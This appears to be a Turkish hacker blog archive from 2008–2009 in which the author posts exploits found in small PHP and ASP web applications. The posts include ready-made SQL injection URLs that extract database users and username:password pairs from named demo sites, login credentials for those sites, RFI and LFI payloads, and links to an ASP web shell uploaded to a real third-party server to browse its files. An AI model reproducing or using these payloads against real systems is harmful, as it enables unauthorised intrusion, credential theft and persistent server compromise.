"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

Remote Sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Remote Sql injection etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

5 Ocak 2009 Pazartesi

plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability

plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7663



Discovered By: ZoRLu

you must login to site

R-Sql

z0rlu.blogspot.com/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

for demo:

user: trt-turk@hotmail.com

pass: salla1

http://www.plxwebdev.com/demos/autoreminder/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

1 Ocak 2009 Perşembe

getaphpsite Home Business Directory (cat_id) Remote Sql inj

getaphpsite Home Business Directory (cat_id) Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/homebusiness-sql.txt

link: http://www.exploiter5.com/all.php?id=63

Discovered By: ZoRLu

Exploit:

http://z0rlu.blogspot.com/script/directory.php?ax=list&sub=ZoRLu&cat_id=[SQL]

[SQL]=

0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users

for demo:

http://www.getaphpsite.com/demos/homebiz/directory.php?ax=list&sub=ZoRLu&cat_id=0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users

22 Aralık 2008 Pazartesi

E-Learning Portal Remote File Upload


E-Learning Portal Remote File Upload

link 1: http://www.exploiter5.com/all.php?id=47

link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt

Discovered By: ZoRLu

exp:

http://www.preprojects.com/elearning/uploaded/your_shell.asp

you register to site

login this site

after upload you_shell.asp

exp for demo:

register:

http://www.preprojects.com/elearning/new_student.asp

login:

role: select STUDENT

user: zorlu

passwd: zorlu1


shell

http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )

server daki siteler:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git


buda golden gate:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM

9 Aralık 2008 Salı

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7392

Discovered By: ZoRLu

file:

_conf/core/common-tpl-vars.php

c0de:

require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 )

rfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?

lfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]

 
Dizi